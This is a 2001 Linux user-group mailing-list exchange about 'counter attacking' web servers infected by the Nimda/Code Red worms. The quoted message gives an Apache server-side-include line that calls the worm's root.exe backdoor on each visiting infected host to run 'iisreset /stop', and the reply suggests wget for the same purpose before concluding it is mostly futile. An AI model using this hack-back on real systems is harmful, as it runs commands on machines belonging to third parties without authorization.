[NTLUG:Discuss] nimba counter attack without PHP?

Jack Snodgrass idiotboy at cybermail.net
Wed Sep 19 20:24:43 CDT 2001


You have to use wget. The syntax is something like
wget -o /dev/null -O - http://url.....

lynx wants a terminal that apache doesn't provide. I think that
if you have CGI debugging on, the logs will show you some 'no terminal'
type messages. I tried several different things with lynx and ended
up giving up on it.

At least that's what I figured out in my testing.

I also decided (rightly or wrongly) that a lot of these
servers that have been compromised won't let you just shut
them down with the shutdown commands that have been posted.
The 'guest' id that runs the web server doesn't have this
ability. Plus.... if you try and manually get back to one of
these servers, 75% (or more) of the time, it's too busy
doing other crap to answer an http:// request. Try it yourself
manually and see what happens.

I decided that I was just wasting my time trying to do anything
useful.

jack



----- Original Message -----
From: "Richard Geoffrion" <richard at rain.lewisville.tx.us>
To: <discuss at ntlug.org>
Sent: Wednesday, September 19, 2001 7:53 PM
Subject: Re: [NTLUG:Discuss] nimba counter attack without PHP?


> so then adding
>
>     AddType text/html .ida
>     AddHandler server-parsed .ida
>
> to the httpd.conf file...and including
>
>     <!--#exec cmd="lynx -source
> http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
>
> is all I can do?
>
> you know...How do I verify that it is working...because I continue to see
> hits to the default.ida file on my webserver that come from the same IP
> address.   for example
>
> <log snip mode=truncated>
> 64.232.230.115 - - [30/Aug/2001:13:13:23 -0500] "GET /default.ida?
> 64.232.230.115 - - [30/Aug/2001:13:29:01 -0500] "GET /default.ida?
> </log snip>
>
> So what...did the server reset and 15 minutes later decide to hit me again?
>
> oh what I wouldn't give for an infected Microsoft server so that I could do
> some tests.  UG.
>
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>



